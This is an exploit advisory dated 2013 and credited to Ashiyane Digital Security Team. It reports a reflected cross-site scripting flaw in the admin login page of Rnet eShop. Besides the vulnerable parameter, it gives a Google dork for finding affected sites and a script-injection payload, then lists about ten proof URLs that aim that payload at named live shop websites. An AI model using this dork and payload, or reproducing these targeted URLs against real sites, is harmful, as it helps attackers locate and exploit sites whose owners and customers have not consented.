_   __   _____    _____
 \ \ / /  / ____|  / ____|
  \ V /  | (___   | (___
   > <    \___ \   \___ \
  / . \   ____) |  ____) |
 /_/ \_\ |_____/  |_____/
#******************************************************************
# [+] Exploit Title : Rnet eShop Cross site scripting vulnerability
#
# [+] Software link : http://www.rnet.no
#
# [+] Exploit Author : Ashiyane Digital Security Team
#
# [+] Tested on: Windows 7 , Linux
#
# [+] Google Dork : intext:" Powered by Rnet eShop"
#
# [+] Date: 2013/09/01
#
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/_admin_login.asp?e=&n=[xss]
#
#-------
# Proof:
#-------
#
# http://www.klamydia.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.glamourtopz.com/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.smart-alarm.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.testselv.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.urmaker-ronning.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.galleri-lindesnes.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.vareshop.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://tarmkreft.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.glamourtopz.com/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
# http://www.perleshop.no/_admin_login.asp?e=&n=
"/><script>alert(1);</script>
#
#
######################
discovered by : ACC3SS
######################